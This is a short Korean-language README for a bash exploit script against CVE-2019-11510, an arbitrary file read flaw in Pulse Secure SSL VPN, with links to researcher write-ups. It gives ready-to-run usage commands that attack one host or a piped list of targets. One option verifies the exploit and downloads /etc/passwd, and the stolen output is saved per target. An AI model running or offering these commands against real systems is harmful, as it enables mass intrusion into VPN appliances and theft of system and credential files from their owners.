
Pulse Secure SSL VPN에서 임의 파일 읽기를 수행하는 익스플로잇 (CVE-2019-11510)
Pulse Secure SSL VPN에서 임의 파일 읽기(Arbitrary File Read)를 수행하는 익스플로잇 (CVE-2019-11510)
단일 도메인 또는 도메인 목록을 사용할 수 있습니다. 도메인 앞에 https://를 포함해야 합니다.
사용법 : cat targetlist.txt | bash CVE-2019-11510.sh / bash CVE-2019-11510.sh -d https://vpn.target.com/
익스플로잇을 검증하고 /etc/passwd를 다운로드하려면 다음을 사용하세요 :
cat targetlist.txt | bash CVE-2019-11510.sh --only-etc-passwd
bash CVE-2019-11510.sh -d https://vpn.target.com/ --only-etc-passwd
출력은 output/vpn.target.com/ 안에 저장됩니다.
데모 :
https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf